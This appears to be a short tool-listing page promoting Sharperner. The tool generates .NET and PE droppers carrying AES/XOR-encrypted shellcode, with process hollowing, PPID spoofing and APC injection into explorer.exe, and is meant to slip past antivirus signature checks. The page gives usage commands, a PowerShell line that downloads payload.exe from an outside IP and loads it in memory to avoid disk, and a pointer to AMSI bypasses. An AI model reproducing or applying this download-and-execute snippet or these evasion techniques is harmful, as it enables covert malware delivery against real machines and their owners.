logo
DATABASE RESOURCES PRICING ABOUT US

Sharperner - Simple Executable Generator With Encrypted Shellcode

Description

[![](https://1.bp.blogspot.com/-y2RPsgnsqeI/YN5nW35YUaI/AAAAAAAAfkQ/aQ1UEc6pFB8TURAOCPLlk9pkORoyfweXQCNcBGAsYHQ/w640-h613/Sharperner_1_scan.png)](<https://1.bp.blogspot.com/-y2RPsgnsqeI/YN5nW35YUaI/AAAAAAAAfkQ/aQ1UEc6pFB8TURAOCPLlk9pkORoyfweXQCNcBGAsYHQ/s812/Sharperner_1_scan.png>) **Sharperner** is a tool written in CSharp that generate .NET [dropper](<https://www.kitploit.com/search/label/Dropper> "dropper" ) with [AES](<https://www.kitploit.com/search/label/AES> "AES" ) and XOR obfuscated shellcode. Generated executable can possibly bypass signature check but I cant be sure it can bypass heuristic scanning. **Features** **PE binary** * Process Hollowing * PPID Spoofing * Random generated AES key and iv * Final Shellcode, Key and IV are translated to morse code :) **.NET binary** * AES + XOR encrypted shellcode * APC Process [Injection](<https://www.kitploit.com/search/label/Injection> "Injection" ) (explorer.exe) * Random function names * Random generated AES key and iv * Final Shellcode, Key and IV are translated to morse code :) **Usage** /file B64,hex,raw shellcode /type cs,cpp /out Output file Location (Optional) Example: Sharperner.exe /file:file.txt /type:cpp Sharperner.exe /file:file.txt /out:payload.exe **Suggestion** To avoid touching the disk, Generated .NET executable can be loaded reflectively with powershell. [AMSI](<https://www.kitploit.com/search/label/AMSI> "AMSI" ) is the enemy now, [amsi.fail](<https://amsi.fail> "amsi.fail" ) ftw! $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/payload.exe') $assem = [System.Reflection.Assembly]::Load($data) [TotallyNotMal.Program]::Main() **[Download Sharperner](<https://github.com/aniqfakhrul/Sharperner> "Download Sharperner" )**